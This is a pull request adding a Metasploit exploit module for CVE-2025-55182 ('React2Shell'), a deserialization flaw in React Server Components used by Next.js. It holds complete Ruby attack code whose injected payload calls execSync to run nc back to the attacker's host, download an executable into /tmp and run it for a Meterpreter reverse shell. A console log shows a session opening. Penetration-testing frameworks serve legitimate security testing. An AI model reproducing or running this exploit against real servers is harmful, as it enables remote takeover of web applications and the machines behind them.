### PR TITLE
Added React2Shell exploit for RSC Next.js applications.

### DIFF
--- a/modules/exploits/linux/http/react2shell.rb
+++ b/modules/exploits/linux/http/react2shell.rb
@@ -126,7 +126,6 @@ class Metasploit3 < Msf::Exploit::Remote
       http.request(request)
     rescue Net::ReadTimeout => e
       print_good("Killing client since it won't receive a reply...")
-      print_status('Fuck b1tch3s get m0n3y... :P')
       http.finish
     end
   rescue StandardError => e

--- a/modules/exploits/linux/http/react2shell.rb
+++ b/modules/exploits/linux/http/react2shell.rb
@@ -1,0 +1,137 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+#       This payload is configured for:
+#       msfvenom -p linux/x86/meterpreter_reverse_tcp --format elf
+#
+# This code exploits React2Shell, a remote code execution vulnerability in React Server Components (RSC) that affects Next.js applications.
+#
+
+require 'msf/core'
+require 'socket'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+                      'Name' => 'RSC data deseriealized in an unsafe way leading to RCE',
+                      'Description' => 'The server processes RSC (React Server Components) data in an unsafe manner leading' \
+                                       'to remote code execution in Next.js and others',
+                      'Author' => [
+                        'Marshall Whittaker',   # exploit author
+                        'Lachlan Davidson'      # original discoverer and poc
+                      ],
+                      'License' => MSF_LICENSE,
+                      'Platform' => 'linux',
+                      'Arch' => [ARCH_X86],
+                      'References' => [
+                        ['URL', 'https://github.com/lachlan2k/React2Shell-CVE-2025-55182-original-poc/tree/main'],
+                        ['URL', 'https://oxasploits.com/exploits/cve-2025-55182-RSC-deserialization-to-rce-react4-shell.rb/'],
+                        ['URL', 'https://react2shell.com/'],
+                        ['CVE', '2025-55182'],
+                        ['CWE', '502']
+                      ],
+                      'Targets' => [
+                        ['React Server Components <= 19.2.0', { 'Privileged' => true }]
+                      ],
+                      'DefaultOptions' => {
+                        'PAYLOAD' => 'linux/x86/meterpreter_reverse_tcp' # lets use a x86 meterpreter rev (others may work)
+                      },
+                      'Payload' => {
+                        'Format' => 'elf', # we need a whole executable for this, we use elf on linux
+                        'Platform' => 'unix'
+                      },
+                      'Notes' => {
+                        'Stability' => [CRASH_SAFE],
+                        'Reliability' => [REPEATABLE_SESSION],
+                        'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+                      },
+                      'DisclosureDate' => '2025-12-3',
+                      'DefaultTarget' => 0))
+    register_options(
+      [
+        Opt::RPORT(3000),
+        OptString.new('RHOST', [true, "The target machine's IP", '']),
+        OptString.new('LHOST', [true, "This machine's IP", '']),
+        OptInt.new('LSERVPORT', [true, 'The port to listen on for pushing the payload', 6789])
+      ], self.class
+    )
+    register_advanced_options([
+                                OptBool.new('HANDLER',
+                                            [true, 'Start an exploit/multi/handler job to receive the connection',
+                                             true])
+                              ])
+    deregister_options('VHOST', 'Proxies', 'RHOSTS', 'SSL')
+  end
+
+  def listen(pload, lsp)
+    print_status('Starting payload push socket...')
+    serv = TCPServer.new(lsp)
+    s = serv.accept
+    s.write(pload)
+    s.close
+  end
+
+  def exploit
+    rhst = datastore['RHOST']
+    rprt = datastore['RPORT']
+    lhst = datastore['LHOST']
+    lsprt = datastore['LSERVPORT']
+    if rhst == '' || rprt == '' || lhst == '' || lsprt == ''
+      fail_with(Failure::BadConfig, 'You need to set RHOST, RPORT, LHOST, and LSRVPORT properly.')
+    end
+    print_status('Generating payload...')
+    pay = framework.modules.create(datastore['payload'])
+    pay.datastore['LHOST'] = datastore['LHOST']
+    pay.datastore['RHOST'] = datastore['RHOST']
+    pay.datastore['LPORT'] = datastore['LPORT']
+    dropit = pay.generate_simple({ 'Format' => 'elf' })
+    fail_with(Failure::PayloadFailed, 'Payload generation failed!  Try a different payload?') if dropit == ''
+    print_good('Payload generated!')
+    Thread.new do
+      listen(dropit, lsprt)
+    end
+    targexe = "/tmp/shell#{rand(2000)}"
+    print_status('Generating JSON string to call execSync...')
+    payl = %({"then": "$1:__proto__:then","status": "resolved_model","reason": -1,"value":
+      "{\\"then\\": \\"$B0\\"}","_response": {"_prefix":
+      "process.mainModule.require('child_process').execSync('nc -q 1 #{lhst} #{lsprt} > #{targexe};
+      sleep 1; chmod 777 #{targexe}; #{targexe}');","_formData": {"get": "$1:constructor:constructor"}}}).squish
+    payb = %("$@0")
+    print_status('Starting HTTP client...')
+    uri = URI("http://#{rhst}:#{rprt}")
+    http = Net::HTTP.new(uri.host, uri.port)
+    http.read_timeout = 1
+    begin
+      http.start
+      request = Net::HTTP::Post.new(uri)
+      request['Next-Action'] = 'oxagast'
+      boundary = "--#{rand(1_000_000)}"
+      request.content_type = "multipart/form-data; boundary=#{boundary}"
+      body = []
+      body << "--#{boundary}"
+      body << 'Content-Disposition: form-data; name="0"'
+      body << ''
+      body << payl
+      body << "--#{boundary}"
+      body << 'Content-Disposition: form-data; name="1"'
+      body << ''
+      body << payb
+      body << "--#{boundary}--"
+      body << ''
+      request.body = body.join("\r\n")
+      http.request(request)
+    rescue Net::ReadTimeout => e
+      print_good("Killing client since it won't receive a reply...")
+      print_status('Fuck b1tch3s get m0n3y... :P')
+      http.finish
+    end
+  rescue StandardError => e
+    puts "An error occurred: #{e.message}"
+  ensure
+    http.finish if http.started?
+  end
+end


### PR DESCRIPTION
This module is an exploit for CVE-2025-55182 otherwise known as 'react2shell'.

The vulnerable server can be setup using:
```
npx create-next-app@16.0.6 sample-app --yes
cd sample app
npm run build
npm run start
```

Then you can use msfconsole to start and run the exploit:

```
msf > use exploit/linux/http/react2shell                                                                                       
[*] Using configured payload linux/x86/meterpreter_reverse_tcp                                                                 
msf exploit(linux/http/react2shell) > info                                                                                                                                                 
       Name: RSC data deseriealized in an unsafe way leading to RCE
     Module: exploit/linux/http/react2shell
   Platform: Linux
       Arch: x86
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2025-12-03

Provided by:
  Marshall Whittaker
  Lachlan Davidson

Module side effects:
 artifacts-on-disk
 ioc-in-logs

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
      Id  Name
      --  ----
  =>  0   React Server Components <= 19.2.0

Check supported:
  No

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  LHOST                       yes       This machine's IP
  LSERVPORT  6789             yes       The port to listen on for pushing the payload
  RHOST                       yes       The target machine's IP
  RPORT      3000             yes       The target port (TCP)

Payload information:

Description:
  The server processes RSC (React Server Components) data in an unsafe manner leadingto remote code execution in Next.js and others

References:
  https://github.com/lachlan2k/React2Shell-CVE-2025-55182-original-poc/tree/main
  https://oxasploits.com/exploits/cve-2025-55182-RSC-deserialization-to-rce-react4-shell.rb/
  https://react2shell.com/
  https://nvd.nist.gov/vuln/detail/CVE-2025-55182
  https://cwe.mitre.org/data/definitions/502.html


View the full module info with the info -d command.

msf exploit(linux/http/react2shell) > set LHOST 127.0.0.1
LHOST => 127.0.0.1
smsf exploit(linux/http/react2shell) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(linux/http/react2shell) > exploit
[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444 
[*] Generating payload...
[+] Payload generated!
[*] Generating JSON string to call execSync...
[*] Starting HTTP client...
[*] Starting payload push socket...
[+] Killing client since it won't receive a reply...
[*] Fuck b1tch3s get m0n3y... :P
[*] Meterpreter session 1 opened (127.0.0.1:4444 -> 127.0.0.1:44164) at 2026-01-01 19:22:02 -0500

meterpreter > 
```

This exploits a deserialization vulnerabilty in RSC Next.js where by you can abuse execSync to get RCE.  It is designed to work (and was tested with) with a Meterpreter reverse shell, but should work with others.